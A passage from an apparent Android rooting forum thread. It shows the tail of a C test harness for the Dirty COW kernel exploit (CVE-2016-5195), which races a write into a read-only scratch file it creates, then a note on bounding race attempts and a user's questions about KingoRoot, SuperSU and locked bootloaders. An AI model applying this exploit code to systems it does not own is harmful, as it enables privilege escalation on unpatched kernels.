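    ssize_t n = read(fd, buf, sizeof buf - 1);
    close(fd);
    if (n < (ssize_t)plen) return -1;
    return memcmp(buf, payload, plen) == 0;
}

/* Self-contained run against a scratch file this program creates itself
 * (path, content, payload and attempt bound are demo choices, not the tool's).
 * Returns 1 (vulnerable), 0 (kernel held) or -1 (could not set up). */
int demo(void)
{
    const char original[] = "ORIGINAL CONTENT OF A READ-ONLY FILE\n";
    char path[] = "/tmp/dirtycow_demo_XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) {                        /* fall back to the working directory */
        strcpy(path, "dirtycow_demo_XXXXXX");
        fd = mkstemp(path);
        if (fd < 0) return -1;
    }
    if (write(fd, original, sizeof original - 1) != (ssize_t)(sizeof original - 1)) {
        close(fd); unlink(path); return -1;
    }
    close(fd);
    chmod(path, 0444);                   /* from here on we can only read it */
    int rc = dirtycow_write(path, "PWNED", 100000);
    unlink(path);
    return rc;
}

int main(void)
{
    int rc = demo();
    puts(rc == 1 ? "file changed: this kernel is vulnerable to CVE-2016-5195"
       : rc == 0 ? "kernel held: patched (or the race was not won)"
       : "setup failed");
    return rc < 0;
}
```

Build with gcc -pthread and run it as an unprivileged user; a patched kernel prints "kernel held". The attempt bound is the important design choice: the doctor's loader evidently runs its race open-ended and then reports the 30 s timeout as a failure code, whereas bounding the iterations makes "not won" a normal return value you can act on (retry, or try the next exploit zip) instead of a hang.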
Thanks for the post. I already rooted using the kingoroot method in the other thread, otherwise I would try this. One question though: after following that other root method I am stuck with having to set the SuperSU access mode to "Grant", which honestly bugs me. Had I followed your guide, would I have been able to set the access mode to "Prompt"?
Oh, one more thing: we cannot flash a custom recovery on this device, right? Locked bootloader and all?